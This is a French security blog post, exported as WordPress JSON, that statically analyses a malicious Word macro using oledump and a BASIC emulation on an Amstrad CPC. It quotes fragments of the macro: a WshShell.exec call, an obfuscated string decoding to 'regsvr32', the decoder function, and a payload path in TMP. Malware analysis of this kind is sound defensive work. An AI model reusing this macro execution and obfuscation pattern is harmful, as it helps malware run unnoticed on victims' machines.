{"id":726,"date":"2020-07-26T17:52:13","date_gmt":"2020-07-26T15:52:13","guid":{"rendered":"http:\/\/pentester.blog\/?p=726"},"modified":"2021-01-04T22:52:27","modified_gmt":"2021-01-04T21:52:27","slug":"analyse-statique-dun-word-malveillant-a-laide-dun-amstrad-cpc","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=726","title":{"rendered":"Analyse statique d’un Word malveillant avec l’aide d’un Amstrad CPC"},"content":{"rendered":"\n

J’ai r\u00e9cup\u00e9r\u00e9 il y a quelques jours un document Word tr\u00e8s suspect, en effet son taux de d\u00e9tection sur VirusTotal \u00e9tait \u00e9lev\u00e9, 17\/62 :<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

J’ai donc commenc\u00e9 cette analyse \u00e0 l’aide de l’outil \u00ab\u00a0oledump<\/a>\u00a0\u00bb de Didier Stevens afin de voir si ce document contenait des macros, et bien oui (les 3 \u00ab\u00a0M\u00a0\u00bb) :<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

J’ai ensuite extrait les macros de ce document Word toujours \u00e0 l’aide de \u00ab\u00a0oledump\u00a0\u00bb.<\/p>\n\n\n\n

Le code n’\u00e9tait pas sp\u00e9cialement obfusqu\u00e9, juste des noms de fonction et de variable \u00e0 rallonge, rien de m\u00e9chant.<\/p>\n\n\n\n

Ce qui est d’embl\u00e9e suspect c’est l’appel \u00e0 la fonction \u00ab\u00a0exec\u00a0\u00bb depuis un objet de type \u00ab\u00a0WshShell\u00a0\u00bb :<\/p>\n\n\n\n

Dim de4f1856 As New WshShell\nCall de4f1856.exec<\/strong>(d088f7a6 & \" \" & ed38e7bb)<\/pre>\n\n\n\n
Mais quel sont les valeurs des arguments pass\u00e9s \u00e0 \u00ab\u00a0exec\u00a0\u00bb, d088f7a6 et ed38e7bb ?<\/p>\n\n\n\n
En cherchant dans le code, on s’aper\u00e7oit que d088f7a6 est une chaine de caract\u00e8res retourn\u00e9e par la fonction c2ec170d :<\/p>\n\n\n\n
Function d088f7a6()\nd088f7a6 = c2ec170d(\"rd0e01gb0sfev9ar013792eb\")\nEnd Function<\/pre>\n\n\n\n
En remontant le code on trouve bien cette fonction c2ec170d :<\/p>\n\n\n\n
Function c2ec170d(c553066f)
For bc6602fc = 1 To Len(c553066f) Step 3
e8a444c7 = e8a444c7 & Mid(c553066f, bc6602fc, 1)
Next
c2ec170d = e8a444c7
End Function<\/pre>\n\n\n\n
OK, c’est une petite fonction qui manipule des caract\u00e8res.<\/p>\n\n\n\n
L’auteur a voulu masqu\u00e9 le r\u00e9sultat de cet appel :<\/p>\n\n\n\n
c2ec170d(\"rd0e01gb0sfev9ar013792eb\")<\/pre>\n\n\n\n
La fonction \u00e9tant toute petite, soit on la d\u00e9roule \u00e0 la main, ce qui est vraiment trivial soit on l’\u00e9mule. <\/p>\n\n\n\n
Comme en parall\u00e8le j’\u00e9tais en train de jouer \u00e0 un vieux jeu sur Amstrad CPC, je me suis dit que j’allais utiliser le Basic de l’Amstrad !<\/p>\n\n\n\n
J’ai donc simplement recopier le code de la fonction c2ec170d (en la simplifiant au passage) et ensuite un petit \u00ab\u00a0RUN\u00a0\u00bb pour obtenir le r\u00e9sultat.<\/p>\n\n\n\n
Voici donc le r\u00e9sultat de l’\u00e9mulation sous un Amstrad CPC (et oui un \u00e9mulateur, WinAPE car snif je n’ai plus de vrai Amstrad…) :<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
On y est, l’auteur a voulu masqu\u00e9 l’appel \u00e0 l’ex\u00e9cutable \u00ab\u00a0regsvr32\u00a0\u00bb.<\/p>\n\n\n\n
Je pense que cette petite obfuscation \u00e9tait simplement l\u00e0 pour bypasser des outils de d\u00e9tection en \u00ab\u00a0pattern matching\u00a0\u00bb.<\/p>\n\n\n\n
Quant au deuxi\u00e8me argument de la fonction \u00ab\u00a0exec\u00a0\u00bb, ed38e7bb, il n’est pas obfusqu\u00e9, il ‘agit du chemin d’un fichier \u00ab\u00a0jpg\u00a0\u00bb dans le r\u00e9pertoire TMP de l’utilisateur :<\/p>\n\n\n\n
Function ed38e7bb()
ed38e7bb = Environ(\"tmp\") & \"\\1.jpg\"
End Function<\/pre>\n\n\n\n
Voila je me suis arr\u00eat\u00e9 l\u00e0 pour l’analyse statique. En effet \u00e0 partir du moment o\u00f9 il y a un appel \u00e0 regsvr32 dans un document Word ce n’est pas bon signe, c’est bien un malware.<\/p>\n\n\n\n
Dans un prochain post on passera \u00e0 l’analyse dynamique.<\/p>\n","protected":false},"excerpt":{"rendered":"
J’ai r\u00e9cup\u00e9r\u00e9 il y a quelques jours un document Word tr\u00e8s suspect, en effet son taux de d\u00e9tection sur VirusTotal \u00e9tait \u00e9lev\u00e9, 17\/62 : J’ai donc commenc\u00e9 cette analyse \u00e0 l’aide de l’outil \u00ab\u00a0oledump\u00a0\u00bb de Didier Stevens afin de voir si ce document contenait des macros, et bien oui (les 3 \u00ab\u00a0M\u00a0\u00bb) : J’ai ensuite … Continuer la lecture de Analyse statique d’un Word malveillant avec l’aide d’un Amstrad CPC<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-726","post","type-post","status-publish","format-standard","hentry","category-malware"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/726","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=726"}],"version-history":[{"count":21,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/726\/revisions"}],"predecessor-version":[{"id":751,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/726\/revisions\/751"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=726"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=726"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=726"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}